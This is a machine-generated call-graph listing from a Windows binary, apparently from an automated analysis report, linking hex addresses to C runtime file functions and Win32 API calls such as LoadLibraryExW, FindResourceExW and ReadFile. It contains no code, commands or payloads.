API calls 99770->101146 101147 a648fe LoadImageW EnumResourceNamesW 99771->101147 99775 a9d4a5 99855->99615 99856->99627 99858 a91b90 __ftell_nolock 99857->99858 99865 a63d50 __ftell_nolock 99864->99865 99866 a67d2c 59 API calls 99865->99866 99871 a63eb6 Mailbox 99865->99871 99868 a63d82 99866->99868 99877 a63db8 Mailbox 99868->99877 99986 a67b52 99868->99986 99869 a67b52 59 API calls 99869->99877 99870 a63e89 99870->99871 99872 a67f41 59 API calls 99870->99872 99871->99660 99874 a63eaa 99872->99874 99873 a67f41 59 API calls 99873->99877 99875 a63f84 59 API calls 99874->99875 99875->99871 99877->99869 99877->99870 99877->99871 99877->99873 99989 a63f84 99877->99989 99995 a64d13 99878->99995 99883 a9dd0f 99886 a64faa 84 API calls 99883->99886 99884 a64f68 LoadLibraryExW 100005 a64cc8 99884->100005 99888 a9dd16 99886->99888 99890 a64cc8 3 API calls 99888->99890 99892 a9dd1e 99890->99892 99891 a64f8f 99891->99892 99893 a64f9b 99891->99893 100031 a6506b 99892->100031 99894 a64faa 84 API calls 99893->99894 99897 a637e6 99894->99897 99897->99667 99897->99669 99899 a9dd45 100039 a65027 99899->100039 99901 a9dd52 99903 a80ff6 Mailbox 59 API calls 99902->99903 99904 a6380d 99903->99904 99904->99681 99906 a6862b 99905->99906 99907 a68652 99906->99907 100469 a68b13 69 API calls Mailbox 99906->100469 99907->99685 99910 a63f05 99909->99910 99911 a63eec 99909->99911 99913 a67d2c 59 API calls 99910->99913 99912 a681a7 59 API calls 99911->99912 99914 a6388b 99912->99914 99913->99914 99915 a8313d 99914->99915 99916 a83149 99915->99916 99917 a831be 99915->99917 99923 a8316e 99916->99923 100470 a88d68 58 API calls __getptd_noexit 99916->100470 100472 a831d0 60 API calls 3 library calls 99917->100472 99920 a831cb 99920->99706 99921 a83155 100471 a88ff6 9 API calls __ftell_nolock 99921->100471 99923->99706 99924 a83160 99924->99706 99926 a69436 99925->99926 99927 a80ff6 Mailbox 59 API calls 99926->99927 99928 a69444 99927->99928 99930 a63936 99928->99930 100473 a6935c 59 API calls Mailbox 99928->100473 99931 a691b0 99930->99931 100474 a692c0 99931->100474 99933 a691bf 99934 a80ff6 Mailbox 59 API calls 99933->99934 99935 a63944 99933->99935 99934->99935 99936 a69040 99935->99936 99937 a9f5a5 99936->99937 99941 a69057 99936->99941 99937->99941 100484 a68d3b 59 API calls Mailbox 99937->100484 99939 a691a0 100483 a69e9c 60 API calls Mailbox 99939->100483 99940 a69158 99942 a80ff6 Mailbox 59 API calls 99940->99942 99941->99939 99941->99940 99944 a6915f 99941->99944 99942->99944 99944->99734 99946 a65045 85 API calls 99945->99946 99947 ac9854 99946->99947 100485 ac99be 99947->100485 99950 a6506b 74 API calls 99951 ac9881 99950->99951 99952 a6506b 74 API calls 99951->99952 99953 ac9891 99952->99953 99954 a6506b 74 API calls 99953->99954 99955 ac98ac 99954->99955 99956 a6506b 74 API calls 99955->99956 99957 ac98c7 99956->99957 99958 a65045 85 API calls 99957->99958 99959 ac98de 99958->99959 99960 a8594c __malloc_crt 58 API calls 99959->99960 99961 ac98e5 99960->99961 99962 a8594c __malloc_crt 58 API calls 99961->99962 99963 ac98ef 99962->99963 99964 a6506b 74 API calls 99963->99964 99965 ac9903 99964->99965 99966 ac9393 GetSystemTimeAsFileTime 99965->99966 99967 ac9916 99966->99967 99968 ac992b 99967->99968 99969 ac9940 99967->99969 99970 a82f95 _free 58 API calls 99968->99970 99971 ac99a5 99969->99971 99972 ac9946 99969->99972 99973 ac9931 99970->99973 99975 a82f95 _free 58 API calls 99971->99975 100491 ac8d90 99972->100491 99977 a82f95 _free 58 API calls 99973->99977 99976 a9d3c1 99975->99976 99976->99671 99980 a64faa 99976->99980 99977->99976 99979 a82f95 _free 58 API calls 99979->99976 99981 a64fb4 99980->99981 99985 a64fbb 99980->99985 99982 a855d6 __fcloseall 83 API calls 99981->99982 99982->99985 99983 a64fca 99983->99671 99984 a64fdb FreeLibrary 99984->99983 99985->99983 99985->99984 99987 a67faf 59 API calls 99986->99987 99988 a67b5d 99987->99988 99988->99868 99990 a63f92 99989->99990 99994 a63fb4 _memmove 99989->99994 99992 a80ff6 Mailbox 59 API calls 99990->99992 99991 a80ff6 Mailbox 59 API calls 99993 a63fc8 99991->99993 99992->99994 99993->99877 99994->99991 100044 a64d61 99995->100044 99998 a64d3a 100000 a64d53 99998->100000 100001 a64d4a FreeLibrary 99998->100001 99999 a64d61 2 API calls 99999->99998 100002 a8548b 100000->100002 100001->100000 100048 a854a0 100002->100048 100004 a64f5c 100004->99883 100004->99884 100205 a64d94 100005->100205 100008 a64ced 100010 a64cff FreeLibrary 100008->100010 100011 a64d08 100008->100011 100009 a64d94 2 API calls 100009->100008 100010->100011 100012 a64dd0 100011->100012 100013 a80ff6 Mailbox 59 API calls 100012->100013 100014 a64de5 100013->100014 100209 a6538e 100014->100209 100016 a64df1 _memmove 100017 a64e2c 100016->100017 100019 a64f21 100016->100019 100020 a64ee9 100016->100020 100018 a65027 69 API calls 100017->100018 100028 a64e35 100018->100028 100223 ac9ba5 95 API calls 100019->100223 100212 a64fe9 CreateStreamOnHGlobal 100020->100212 100023 a6506b 74 API calls 100023->100028 100025 a64ec9 100025->99891 100026 a9dcd0 100027 a65045 85 API calls 100026->100027 100029 a9dce4 100027->100029 100028->100023 100028->100025 100028->100026 100218 a65045 100028->100218 100030 a6506b 74 API calls 100029->100030 100030->100025 100032 a6507d 100031->100032 100033 a9ddf6 100031->100033 100247 a85812 100032->100247 100036 ac9393 100446 ac91e9 100036->100446 100038 ac93a9 100038->99899 100040 a65036 100039->100040 100043 a9ddb9 100039->100043 100451 a85e90 100040->100451 100042 a6503e 100042->99901 100045 a64d2e 100044->100045 100046 a64d6a LoadLibraryA 100044->100046 100045->99998 100045->99999 100046->100045 100047 a64d7b GetProcAddress 100046->100047 100047->100045 100050 a854ac __initptd 100048->100050 100049 a854bf 100097 a88d68 58 API calls __getptd_noexit 100049->100097 100050->100049 100052 a854f0 100050->100052 100067 a90738 100052->100067 100053 a854c4 100098 a88ff6 9 API calls __ftell_nolock 100053->100098 100056 a854f5 100057 a8550b 100056->100057 100058 a854fe 100056->100058 100060 a85535 100057->100060 100061 a85515 100057->100061 100099 a88d68 58 API calls __getptd_noexit 100058->100099 100082 a90857 100060->100082 100100 a88d68 58 API calls __getptd_noexit 100061->100100 100063 a854cf __initptd @_EH4_CallFilterFunc@8 100063->100004 100068 a90744 __initptd 100067->100068 100069 a89e4b __lock 58 API calls 100068->100069 100080 a90752 100069->100080 100070 a907c6 100102 a9084e 100070->100102 100071 a907cd 100072 a88a5d __malloc_crt 58 API calls 100071->100072 100074 a907d4 100072->100074 100074->100070 100107 a8a06b InitializeCriticalSectionAndSpinCount 100074->100107 100075 a90843 __initptd 100075->100056 100077 a89ed3 __mtinitlocknum 58 API calls 100077->100080 100079 a907fa EnterCriticalSection 100079->100070 100080->100070 100080->100071 100080->100077 100105 a86e8d 59 API calls __lock 100080->100105 100106 a86ef7 LeaveCriticalSection LeaveCriticalSection _doexit 100080->100106 100090 a90877 __wopenfile 100082->100090 100083 a90891 100112 a88d68 58 API calls __getptd_noexit 100083->100112 100085 a90896 100113 a88ff6 9 API calls __ftell_nolock 100085->100113 100087 a85540 100101 a85562 LeaveCriticalSection LeaveCriticalSection _fseek 100087->100101 100088 a90aaf 100109 a987f1 100088->100109 100090->100083 100096 a90a4c 100090->100096 100114 a83a0b 60 API calls 2 library calls 100090->100114 100092 a90a45 100092->100096 100115 a83a0b 60 API calls 2 library calls 100092->100115 100094 a90a64 100094->100096 100116 a83a0b 60 API calls 2 library calls 100094->100116 100096->100083 100096->100088 100097->100053 100098->100063 100099->100063 100100->100063 100101->100063 100108 a89fb5 LeaveCriticalSection 100102->100108 100104 a90855 100104->100075 100105->100080 100106->100080 100107->100079 100108->100104 100117 a97fd5 100109->100117 100111 a9880a 100111->100087 100112->100085 100113->100087 100114->100092 100115->100094 100116->100096 100118 a97fe1 __initptd 100117->100118 100119 a97ff7 100118->100119 100122 a9802d 100118->100122 100202 a88d68 58 API calls __getptd_noexit 100119->100202 100121 a97ffc 100203 a88ff6 9 API calls __ftell_nolock 100121->100203 100128 a9809e 100122->100128 100125 a98049 100204 a98072 LeaveCriticalSection __unlock_fhandle 100125->100204 100127 a98006 __initptd 100127->100111 100129 a980be 100128->100129 100130 a8471a __wsopen_nolock 58 API calls 100129->100130 100133 a980da 100130->100133 100131 a89006 __invoke_watson 8 API calls 100132 a987f0 100131->100132 100134 a97fd5 __wsopen_helper 103 API calls 100132->100134 100135 a98114 100133->100135 100146 a98137 100133->100146 100151 a98211 100133->100151 100136 a9880a 100134->100136 100137 a88d34 __chsize_nolock 58 API calls 100135->100137 100136->100125 100138 a98119 100137->100138 100139 a88d68 __ftell_nolock 58 API calls 100138->100139 100140 a98126 100139->100140 100142 a88ff6 __ftell_nolock 9 API calls 100140->100142 100141 a981f5 100143 a88d34 __chsize_nolock 58 API calls 100141->100143 100144 a98130 100142->100144 100145 a981fa 100143->100145 100144->100125 100147 a88d68 __ftell_nolock 58 API calls 100145->100147 100146->100141 100149 a981d3 100146->100149 100148 a98207 100147->100148 100150 a88ff6 __ftell_nolock 9 API calls 100148->100150 100152 a8d4d4 __alloc_osfhnd 61 API calls 100149->100152 100150->100151 100151->100131 100153 a982a1 100152->100153 100154 a982ab 100153->100154 100155 a982ce 100153->100155 100157 a88d34 __chsize_nolock 58 API calls 100154->100157 100156 a97f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100155->100156 100167 a982f0 100156->100167 100158 a982b0 100157->100158 100160 a88d68 __ftell_nolock 58 API calls 100158->100160 100159 a9836e GetFileType 100162 a98379 GetLastError 100159->100162 100163 a983bb 100159->100163 100161 a982ba 100160->100161 100165 a88d68 __ftell_nolock 58 API calls 100161->100165 100166 a88d47 __dosmaperr 58 API calls 100162->100166 100174 a8d76a __set_osfhnd 59 API calls 100163->100174 100164 a9833c GetLastError 100168 a88d47 __dosmaperr 58 API calls 100164->100168 100165->100144 100169 a983a0 CloseHandle 100166->100169 100167->100159 100167->100164 100170 a97f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100167->100170 100171 a98361 100168->100171 100169->100171 100172 a983ae 100169->100172 100173 a98331 100170->100173 100175 a88d68 __ftell_nolock 58 API calls 100171->100175 100176 a88d68 __ftell_nolock 58 API calls 100172->100176 100173->100159 100173->100164 100179 a983d9 100174->100179 100175->100151 100177 a983b3 100176->100177 100177->100171 100178 a98594 100178->100151 100181 a98767 CloseHandle 100178->100181 100179->100178 100180 a91b11 __lseeki64_nolock 60 API calls 100179->100180 100199 a9845a 100179->100199 100182 a98443 100180->100182 100183 a97f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100181->100183 100185 a88d34 __chsize_nolock 58 API calls 100182->100185 100182->100199 100184 a9878e 100183->100184 100187 a987c2 100184->100187 100188 a98796 GetLastError 100184->100188 100185->100199 100186 a910ab 70 API calls __read_nolock 100186->100199 100187->100151 100189 a88d47 __dosmaperr 58 API calls 100188->100189 100191 a987a2 100189->100191 100190 a9848c 100193 a999f2 __chsize_nolock 82 API calls 100190->100193 100190->100199 100194 a8d67d __free_osfhnd 59 API calls 100191->100194 100192 a90d2d __close_nolock 61 API calls 100192->100199 100193->100190 100194->100187 100195 a8dac6 __write 78 API calls 100195->100199 100196 a98611 100197 a90d2d __close_nolock 61 API calls 100196->100197 100200 a98618 100197->100200 100198 a91b11 60 API calls __lseeki64_nolock 100198->100199 100199->100178 100199->100186 100199->100190 100199->100192 100199->100195 100199->100196 100199->100198 100201 a88d68 __ftell_nolock 58 API calls 100200->100201 100201->100151 100202->100121 100203->100127 100204->100127 100206 a64ce1 100205->100206 100207 a64d9d LoadLibraryA 100205->100207 100206->100008 100206->100009 100207->100206 100208 a64dae GetProcAddress 100207->100208 100208->100206 100210 a80ff6 Mailbox 59 API calls 100209->100210 100211 a653a0 100210->100211 100211->100016 100213 a65003 FindResourceExW 100212->100213 100215 a65020 100212->100215 100214 a9dd5c LoadResource 100213->100214 100213->100215 100214->100215 100216 a9dd71 SizeofResource 100214->100216 100215->100017 100216->100215 100217 a9dd85 LockResource 100216->100217 100217->100215 100219 a65054 100218->100219 100222 a9ddd4 100218->100222 100224 a85a7d 100219->100224 100221 a65062 100221->100028 100223->100017 100228 a85a89 __initptd 100224->100228 100225 a85a9b 100237 a88d68 58 API calls __getptd_noexit 100225->100237 100227 a85ac1 100239 a86e4e 100227->100239 100228->100225 100228->100227 100229 a85aa0 100238 a88ff6 9 API calls __ftell_nolock 100229->100238 100232 a85ac7 100245 a859ee 83 API calls 3 library calls 100232->100245 100234 a85ad6 100246 a85af8 LeaveCriticalSection LeaveCriticalSection _fseek 100234->100246 100236 a85aab __initptd 100236->100221 100237->100229 100238->100236 100240 a86e5e 100239->100240 100241 a86e80 EnterCriticalSection 100239->100241 100240->100241 100242 a86e66 100240->100242 100243 a86e76 100241->100243 100244 a89e4b __lock 58 API calls 100242->100244 100243->100232 100244->100243 100245->100234 100246->100236 100250 a8582d 100247->100250 100249 a6508e 100249->100036 100251 a85839 __initptd 100250->100251 100252 a8587c 100251->100252 100253 a8584f _memset 100251->100253 100255 a85874 __initptd 100251->100255 100254 a86e4e __lock_file 59 API calls 100252->100254 100277 a88d68 58 API calls __getptd_noexit 100253->100277 100256 a85882 100254->100256 100255->100249 100263 a8564d 100256->100263 100259 a85869 100278 a88ff6 9 API calls __ftell_nolock 100259->100278 100267 a85668 _memset 100263->100267 100270 a85683 100263->100270 100264 a85673 100375 a88d68 58 API calls __getptd_noexit 100264->100375 100266 a85678 100376 a88ff6 9 API calls __ftell_nolock 100266->100376 100267->100264 100267->100270 100274 a856c3 100267->100274 100279 a858b6 LeaveCriticalSection LeaveCriticalSection _fseek 100270->100279 100271 a857d4 _memset 100378 a88d68 58 API calls __getptd_noexit 100271->100378 100274->100270 100274->100271 100280 a84916 100274->100280 100287 a910ab 100274->100287 100355 a90df7 100274->100355 100377 a90f18 58 API calls 3 library calls 100274->100377 100277->100259 100278->100255 100279->100255 100281 a84920 100280->100281 100282 a84935 100280->100282 100379 a88d68 58 API calls __getptd_noexit 100281->100379 100282->100274 100284 a84925 100380 a88ff6 9 API calls __ftell_nolock 100284->100380 100286 a84930 100286->100274 100288 a910cc 100287->100288 100289 a910e3 100287->100289 100390 a88d34 58 API calls __getptd_noexit 100288->100390 100291 a9181b 100289->100291 100296 a9111d 100289->100296 100405 a88d34 58 API calls __getptd_noexit 100291->100405 100293 a910d1 100391 a88d68 58 API calls __getptd_noexit 100293->100391 100294 a91820 100406 a88d68 58 API calls __getptd_noexit 100294->100406 100298 a91125 100296->100298 100303 a9113c 100296->100303 100392 a88d34 58 API calls __getptd_noexit 100298->100392 100299 a91131 100407 a88ff6 9 API calls __ftell_nolock 100299->100407 100301 a9112a 100393 a88d68 58 API calls __getptd_noexit 100301->100393 100304 a91151 100303->100304 100307 a9116b 100303->100307 100308 a91189 100303->100308 100335 a910d8 100303->100335 100394 a88d34 58 API calls __getptd_noexit 100304->100394 100307->100304 100312 a91176 100307->100312 100309 a88a5d __malloc_crt 58 API calls 100308->100309 100310 a91199 100309->100310 100313 a911bc 100310->100313 100314 a911a1 100310->100314 100381 a95ebb 100312->100381 100397 a91b11 60 API calls 3 library calls 100313->100397 100395 a88d68 58 API calls __getptd_noexit 100314->100395 100315 a9128a 100317 a91303 ReadFile 100315->100317 100322 a912a0 GetConsoleMode 100315->100322 100320 a917e3 GetLastError 100317->100320 100321 a91325 100317->100321 100319 a911a6 100396 a88d34 58 API calls __getptd_noexit 100319->100396 100324 a917f0 100320->100324 100325 a912e3 100320->100325 100321->100320 100329 a912f5 100321->100329 100326 a91300 100322->100326 100327 a912b4 100322->100327 100403 a88d68 58 API calls __getptd_noexit 100324->100403 100338 a912e9 100325->100338 100398 a88d47 58 API calls 3 library calls 100325->100398 100326->100317 100327->100326 100330 a912ba ReadConsoleW 100327->100330 100337 a915c7 100329->100337 100329->100338 100340 a9135a 100329->100340 100330->100329 100332 a912dd GetLastError 100330->100332 100331 a917f5 100404 a88d34 58 API calls __getptd_noexit 100331->100404 100332->100325 100335->100274 100336 a82f95 _free 58 API calls 100336->100335 100337->100338 100342 a916cd ReadFile 100337->100342 100338->100335 100338->100336 100341 a913c6 ReadFile 100340->100341 100345 a91447 100340->100345 100343 a913e7 GetLastError 100341->100343 100346 a913f1 100341->100346 100348 a916f0 GetLastError 100342->100348 100354 a916fe 100342->100354 100343->100346 100344 a914f4 100400 a88d68 58 API calls __getptd_noexit 100344->100400 100345->100338 100345->100344 100349 a91504 100345->100349 100351 a914b4 MultiByteToWideChar 100345->100351 100346->100340 100399 a91b11 60 API calls 3 library calls 100346->100399 100348->100354 100349->100351 100401 a91b11 60 API calls 3 library calls 100349->100401 100351->100332 100351->100338 100354->100337 100402 a91b11 60 API calls 3 library calls 100354->100402 100356 a90e02 100355->100356 100360 a90e17 100355->100360 100441 a88d68 58 API calls __getptd_noexit 100356->100441 100358 a90e07 100442 a88ff6 9 API calls __ftell_nolock 100358->100442 100361 a90e12 100360->100361 100362 a90e4c 100360->100362 100443 a96234 100360->100443 100361->100274 100364 a84916 __ftell_nolock 58 API calls 100362->100364 100365 a90e60 100364->100365 100408 a90f97 100365->100408 100367 a90e67 100367->100361 100368 a84916 __ftell_nolock 58 API calls 100367->100368 100369 a90e8a 100368->100369 100369->100361 100370 a84916 __ftell_nolock 58 API calls 100369->100370 100371 a90e96 100370->100371 100371->100361 100372 a84916 __ftell_nolock 58 API calls 100371->100372 100373 a90ea3 100372->100373 100374 a84916 __ftell_nolock 58 API calls 100373->100374 100374->100361 100375->100266 100376->100270 100377->100274 100378->100266 100379->100284 100380->100286 100382 a95ed3 100381->100382 100383 a95ec6 100381->100383 100385 a95edf 100382->100385 100386 a88d68 __ftell_nolock 58 API calls 100382->100386 100384 a88d68 __ftell_nolock 58 API calls 100383->100384 100387 a95ecb 100384->100387 100385->100315 100388 a95f00 100386->100388 100387->100315 100389 a88ff6 __ftell_nolock 9 API calls 100388->100389 100389->100387 100390->100293 100391->100335 100392->100301 100393->100299 100394->100301 100395->100319 100396->100335 100397->100312 100398->100338 100399->100346 100400->100338 100401->100351 100402->100354 100403->100331 100404->100338 100405->100294 100406->100299 100407->100335 100409 a90fa3 __initptd 100408->100409 100410 a90fb0 100409->100410 100411 a90fc7 100409->100411 100413 a88d34 __chsize_nolock 58 API calls 100410->100413 100412 a9108b 100411->100412 100414 a90fdb 100411->100414 100415 a88d34 __chsize_nolock 58 API calls 100412->100415 100416 a90fb5 100413->100416 100417 a90ff9 100414->100417 100418 a91006 100414->100418 100419 a90ffe 100415->100419 100420 a88d68 __ftell_nolock 58 API calls 100416->100420 100421 a88d34 __chsize_nolock 58 API calls 100417->100421 100422 a91028 100418->100422 100423 a91013 100418->100423 100427 a88d68 __ftell_nolock 58 API calls 100419->100427 100424 a90fbc __initptd 100420->100424 100421->100419 100426 a8d446 ___lock_fhandle 59 API calls 100422->100426 100425 a88d34 __chsize_nolock 58 API calls 100423->100425 100424->100367 100428 a91018 100425->100428 100429 a9102e 100426->100429 100430 a91020 100427->100430 100431 a88d68 __ftell_nolock 58 API calls 100428->100431 100432 a91041 100429->100432 100433 a91054 100429->100433 100434 a88ff6 __ftell_nolock 9 API calls 100430->100434 100431->100430 100436 a910ab __read_nolock 70 API calls 100432->100436 100435 a88d68 __ftell_nolock 58 API calls 100433->100435 100434->100424 100438 a91059 100435->100438 100437 a9104d 100436->100437 100440 a91083 __read LeaveCriticalSection 100437->100440 100439 a88d34 __chsize_nolock 58 API calls 100438->100439 100439->100437 100440->100424 100441->100358 100442->100361 100444 a88a5d __malloc_crt 58 API calls 100443->100444 100445 a96249 100444->100445 100445->100362 100449 a8543a GetSystemTimeAsFileTime 100446->100449 100448 ac91f8 100448->100038 100450 a85468 __aulldiv 100449->100450 100450->100448 100452 a85e9c __initptd 100451->100452 100453 a85eae 100452->100453 100454 a85ec3 100452->100454 100465 a88d68 58 API calls __getptd_noexit 100453->100465 100455 a86e4e __lock_file 59 API calls 100454->100455 100457 a85ec9 100455->100457 100467 a85b00 67 API calls 3 library calls 100457->100467 100458 a85eb3 100466 a88ff6 9 API calls __ftell_nolock 100458->100466 100461 a85ed4 100468 a85ef4 LeaveCriticalSection LeaveCriticalSection _fseek 100461->100468 100463 a85ee6 100464 a85ebe __initptd 100463->100464 100464->100042 100465->100458 100466->100464 100467->100461 100468->100463 100469->99907 100470->99921 100471->99924 100472->99920 100473->99930 100475 a692c9 Mailbox 100474->100475 100476 a9f5c8 100475->100476 100481 a692d3 100475->100481 100477 a80ff6 Mailbox 59 API calls 100476->100477 100479 a9f5d4 100477->100479 100478 a692da 100478->99933 100481->100478 100482 a69df0 59 API calls Mailbox 100481->100482 100482->100481 100483->99944 100484->99941 100490 ac99d2 __tzset_nolock _wcscmp 100485->100490 100486 ac9866 100486->99950 100486->99976 100487 a6506b 74 API calls 100487->100490 100488 ac9393 GetSystemTimeAsFileTime 100488->100490 100489 a65045 85 API calls 100489->100490 100490->100486 100490->100487 100490->100488 100490->100489 100492 ac8d9b 100491->100492 100494 ac8da9 100491->100494 100493 a8548b 115 API calls 100492->100493 100493->100494 100495 ac8dee 100494->100495 100496 a8548b 115 API calls 100494->100496 100517 ac8db2 100494->100517 100522 ac901b 100495->100522 100498 ac8dd3 100496->100498 100498->100495 100500 ac8ddc 100498->100500 100499 ac8e32 100501 ac8e36 100499->100501 100502 ac8e57 100499->100502 100505 a855d6 __fcloseall 83 API calls 100500->100505 100500->100517 100504 ac8e43 100501->100504 100507 a855d6 __fcloseall 83 API calls 100501->100507 100526 ac8c33 100502->100526 100510 a855d6 __fcloseall 83 API calls 100504->100510 100504->100517 100505->100517 100507->100504 100508 ac8e85 100535 ac8eb5 100508->100535 100509 ac8e65 100511 ac8e72 100509->100511 100513 a855d6 __fcloseall 83 API calls 100509->100513 100510->100517 100515 a855d6 __fcloseall 83 API calls 100511->100515 100511->100517 100513->100511 100515->100517 100517->99979 100519 ac8ea0 100519->100517 100521 a855d6 __fcloseall 83 API calls 100519->100521 100521->100517 100523 ac9040 100522->100523 100525 ac9029 __tzset_nolock _memmove 100522->100525 100524 a85812 __fread_nolock 74 API calls 100523->100524 100524->100525 100525->100499 100527 a8594c __malloc_crt 58 API calls 100526->100527 100528 ac8c42 100527->100528 100529 a8594c __malloc_crt 58 API calls 100528->100529 100530 ac8c56 100529->100530 100531 a8594c __malloc_crt 58 API calls 100530->100531 100532 ac8c6a 100531->100532 100533 ac8f97 58 API calls 100532->100533 100534 ac8c7d 100532->100534 100533->100534 100534->100508 100534->100509 100542 ac8eca 100535->100542 100536 ac8f82 100564 ac91bf 100536->100564 100538 ac8c8f 74 API calls 100538->100542 100539 ac8e8c 100543 ac8f97 100539->100543 100542->100536 100542->100538 100542->100539 100568 ac8d2b 74 API calls 100542->100568 100569 ac909c 80 API calls 100542->100569 100544 ac8faa 100543->100544 100545 ac8fa4 100543->100545 100547 ac8fbb 100544->100547 100548 a82f95 _free 58 API calls 100544->100548 100546 a82f95 _free 58 API calls 100545->100546 100546->100544 100549 ac8e93 100547->100549 100550 a82f95 _free 58 API calls 100547->100550 100548->100547 100549->100519 100551 a855d6 100549->100551 100550->100549 100552 a855e2 __initptd 100551->100552 100553 a8560e 100552->100553 100554 a855f6 100552->100554 100556 a86e4e __lock_file 59 API calls 100553->100556 100560 a85606 __initptd 100553->100560 100671 a88d68 58 API calls __getptd_noexit 100554->100671 100558 a85620 100556->100558 100557 a855fb 100672 a88ff6 9 API calls __ftell_nolock 100557->100672 100655 a8556a 100558->100655 100560->100519 100565 ac91cc 100564->100565 100566 ac91dd 100564->100566 100570 a84a93 100565->100570 100566->100539 100568->100542 100569->100542 100571 a84a9f __initptd 100570->100571 100572 a84abd 100571->100572 100573 a84ad5 100571->100573 100575 a84acd __initptd 100571->100575 100595 a88d68 58 API calls __getptd_noexit 100572->100595 100576 a86e4e __lock_file 59 API calls 100573->100576 100575->100566 100577 a84adb 100576->100577 100583 a8493a 100577->100583 100578 a84ac2 100596 a88ff6 9 API calls __ftell_nolock 100578->100596 100585 a84949 100583->100585 100592 a84967 100583->100592 100584 a84957 100647 a88d68 58 API calls __getptd_noexit 100584->100647 100585->100584 100589 a84981 _memmove 100585->100589 100585->100592 100587 a8495c 100648 a88ff6 9 API calls __ftell_nolock 100587->100648 100589->100592 100593 a84916 __ftell_nolock 58 API calls 100589->100593 100598 a8dac6 100589->100598 100626 a8b05e 100589->100626 100649 a84c6d 100589->100649 100597 a84b0d LeaveCriticalSection LeaveCriticalSection _fseek 100592->100597 100593->100589 100595->100578 100596->100575 100597->100575 100599 a8dad2 __initptd 100598->100599 100600 a8dadf 100599->100600 100601 a8daf6 100599->100601 100602 a88d34 __chsize_nolock 58 API calls 100600->100602 100603 a8db95 100601->100603 100604 a8db0a 100601->100604 100606 a8dae4 100602->100606 100605 a88d34 __chsize_nolock 58 API calls 100603->100605 100607 a8db28 100604->100607 100608 a8db32 100604->100608 100609 a8db2d 100605->100609 100610 a88d68 __ftell_nolock 58 API calls 100606->100610 100611 a88d34 __chsize_nolock 58 API calls 100607->100611 100612 a8d446 ___lock_fhandle 59 API calls 100608->100612 100614 a88d68 __ftell_nolock 58 API calls 100609->100614 100623 a8daeb __initptd 100610->100623 100611->100609 100613 a8db38 100612->100613 100615 a8db4b 100613->100615 100616 a8db5e 100613->100616 100617 a8dba1 100614->100617 100618 a8dbb5 __write_nolock 76 API calls 100615->100618 100620 a88d68 __ftell_nolock 58 API calls 100616->100620 100619 a88ff6 __ftell_nolock 9 API calls 100617->100619 100621 a8db57 100618->100621 100619->100623 100622 a8db63 100620->100622 100625 a8db8d __write LeaveCriticalSection 100621->100625 100624 a88d34 __chsize_nolock 58 API calls 100622->100624 100623->100589 100624->100621 100625->100623 100627 a84916 __ftell_nolock 58 API calls 100626->100627 100628 a8b06c 100627->100628 100629 a8b08e 100628->100629 100630 a8b077 100628->100630 100632 a8b093 100629->100632 100640 a8b0a0 __flswbuf 100629->100640 100631 a88d68 __ftell_nolock 58 API calls 100630->100631 100634 a8b07c 100631->100634 100633 a88d68 __ftell_nolock 58 API calls 100632->100633 100633->100634 100634->100589 100635 a8b17e 100637 a8dac6 __write 78 API calls 100635->100637 100636 a8b104 100638 a8b11e 100636->100638 100641 a8b135 100636->100641 100637->100634 100639 a8dac6 __write 78 API calls 100638->100639 100639->100634 100640->100634 100642 a95ebb __flswbuf 58 API calls 100640->100642 100643 a8b0ef 100640->100643 100646 a8b0fa 100640->100646 100641->100634 100644 a91a15 __lseeki64 62 API calls 100641->100644 100642->100643 100645 a96234 __getbuf 58 API calls 100643->100645 100643->100646 100644->100634 100645->100646 100646->100635 100646->100636 100647->100587 100648->100592 100650 a84c80 100649->100650 100651 a84ca4 100649->100651 100650->100651 100652 a84916 __ftell_nolock 58 API calls 100650->100652 100651->100589 100653 a84c9d 100652->100653 100654 a8dac6 __write 78 API calls 100653->100654 100654->100651 100656 a85579 100655->100656 100657 a8558d 100655->100657 100704 a88d68 58 API calls __getptd_noexit 100656->100704 100660 a84c6d __flush 78 API calls 100657->100660 100663 a85589 100657->100663 100659 a8557e 100705 a88ff6 9 API calls __ftell_nolock 100659->100705 100662 a85599 100660->100662 100674 a90dc7 100662->100674 100673 a85645 LeaveCriticalSection LeaveCriticalSection _fseek 100663->100673 100666 a84916 __ftell_nolock 58 API calls 100667 a855a7 100666->100667 100678 a90c52 100667->100678 100669 a855ad 100669->100663 100670 a82f95 _free 58 API calls 100669->100670 100670->100663 100671->100557 100672->100560 100673->100560 100675 a855a1 100674->100675 100676 a90dd4 100674->100676 100675->100666 100676->100675 100677 a82f95 _free 58 API calls 100676->100677 100677->100675 100679 a90c5e __initptd 100678->100679 100680 a90c6b 100679->100680 100681 a90c82 100679->100681 100730 a88d34 58 API calls __getptd_noexit 100680->100730 100683 a90d0d 100681->100683 100685 a90c92 100681->100685 100735 a88d34 58 API calls __getptd_noexit 100683->100735 100684 a90c70 100731 a88d68 58 API calls __getptd_noexit 100684->100731 100688 a90cba 100685->100688 100689 a90cb0 100685->100689 100706 a8d446 100688->100706 100732 a88d34 58 API calls __getptd_noexit 100689->100732 100690 a90cb5 100736 a88d68 58 API calls __getptd_noexit 100690->100736 100692 a90c77 __initptd 100692->100669 100695 a90cc0 100697 a90cde 100695->100697 100698 a90cd3 100695->100698 100696 a90d19 100737 a88ff6 9 API calls __ftell_nolock 100696->100737 100733 a88d68 58 API calls __getptd_noexit 100697->100733 100715 a90d2d 100698->100715 100702 a90cd9 100734 a90d05 LeaveCriticalSection __unlock_fhandle 100702->100734 100704->100659 100705->100663 100707 a8d452 __initptd 100706->100707 100708 a8d4a1 EnterCriticalSection 100707->100708 100709 a89e4b __lock 58 API calls 100707->100709 100710 a8d4c7 __initptd 100708->100710 100711 a8d477 100709->100711 100710->100695 100712 a8d48f 100711->100712 100738 a8a06b InitializeCriticalSectionAndSpinCount 100711->100738 100739 a8d4cb LeaveCriticalSection _doexit 100712->100739 100740 a8d703 100715->100740 100717 a90d91 100753 a8d67d 59 API calls 2 library calls 100717->100753 100718 a90d3b 100718->100717 100720 a90d6f 100718->100720 100723 a8d703 __chsize_nolock 58 API calls 100718->100723 100720->100717 100721 a8d703 __chsize_nolock 58 API calls 100720->100721 100724 a90d7b FindCloseChangeNotification 100721->100724 100722 a90d99 100725 a90dbb 100722->100725 100754 a88d47 58 API calls 3 library calls 100722->100754 100726 a90d66 100723->100726 100724->100717 100727 a90d87 GetLastError 100724->100727 100725->100702 100729 a8d703 __chsize_nolock 58 API calls 